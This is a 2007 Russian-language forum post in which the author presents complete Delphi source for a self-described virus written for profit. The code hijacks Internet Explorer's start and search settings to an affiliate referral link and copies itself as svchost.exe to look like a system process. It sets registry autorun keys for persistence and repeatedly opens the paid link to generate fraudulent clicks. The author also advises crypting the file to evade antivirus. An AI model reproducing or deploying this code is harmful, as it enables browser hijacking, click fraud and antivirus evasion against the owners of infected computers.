|
Написал admin
|
|
16.11.2007 |
Итак, от нечего делать когда упали мои продажи по кликам пришлось
стать хамом ;)
И написать вирус, чтоб не палися антивирем и приносил прибыль делая
из компов ботов!
Вирус написан на Дельфи! Поймёт тот кто шарит хоть немного!
Создаём проект!
Удаляем главную форму!
===
После компиляции важно поменять имя в base.exe!
Также не мешает криптануть файлег чтоб не палилсо антивирями
program Project2;
uses
Windows,
registry,
ShellAPI,
Forms;
//{$R *.res}
Var Reg:TRegistry; I:integer; disk: PChar;
procedure SetAutorun(aProgTitle,aCmdLine: string; aRunOnce: boolean );
var
hKey: string;
hReg: TRegIniFile;
begin
if aRunOnce then hKey := 'Once'
else
hKey := '';
hReg := TRegIniFile.Create( '' );
hReg.RootKey := HKEY_LOCAL_MACHINE;
hReg.WriteString('Software\Microsoft\Windows\CurrentVersion\Run'
+ hKey + #0,
aProgTitle,
aCmdLine );
hReg.destroy;
end;
begin
Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_Current_User;
Reg.OpenKey('SoftwareMicrosoftInternet ExplorerMain',true);
//Платные ссылки для кликов
Reg.WriteString('Start Page','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.WriteString('Use Search Asst','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.WriteString('Search Page','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.WriteString('Search Bar','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.CloseKey;
Reg.OpenKey('SoftwareMicrosoftInternet Explorer',true);
Reg.WriteString('SearchURL','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.CloseKey;
Reg.OpenKey('SoftwareMicrosoftInternet ExplorerSearchURL',true);
Reg.WriteString('provide','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.CloseKey;
Reg.OpenKey('SoftwareMicrosoftInternet ExplorerSearch',true);
Reg.WriteString('SearchAssistant','http://www.russianfeme.com/index.html?l=r&ref=10585');
Reg.CloseKey;
Reg.OpenKey('SoftwareMicrosoftWindowsCurrentVersionExplorerShell Folders',true);
//base.exe так должена называтся прга для удачного заражения!
CopyFile('base.exe','C:\WINDOWS\svchost.exe',true);
if CopyFile('base.exe','D:\WINDOWS\svchost.exe',true) then begin SetAutorun('lol', 'D:\WINDOWS\svchost.exe', true) end;
SetAutorun('lol', 'C:\WINDOWS\svchost.exe', true);
for i:=0 to 10 do
begin
sleep(15000); // Это где-то 1.5 часа (в миллисекундах)
shellexecute(application.Handle,nil,pchar('http://www.russianfeme.com/index.html?l=r&ref=10585'),nil,nil,sw_normal);
end;
end. |
Автор: © П.Cергей(Актобе) Просмотров: 2199
Только зарегистрированные пользователи могут оставлять коментарии. Пожалуйста зарегистрируйтесь или войдите в ваш аккаунт. |